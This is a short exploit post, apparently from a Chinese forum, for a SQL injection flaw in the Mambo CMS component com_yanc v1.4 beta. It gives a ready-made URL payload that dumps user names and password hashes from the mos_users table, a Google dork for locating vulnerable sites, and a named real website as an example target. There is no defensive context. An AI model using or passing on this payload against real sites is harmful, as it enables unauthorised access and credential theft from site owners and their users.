国外的php网站内容管理系统,暴出的大多数是国外站的密码..
mambo com_yanc v1.4 beta (id) blind remote sql injection vuln
-------------------------------------------------------------
bulan: cyber-security
exploit: index.php?option=com_yanc&itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
example:http://www.tnrb.net/
google dork: inurl:index.php?option=com_yanc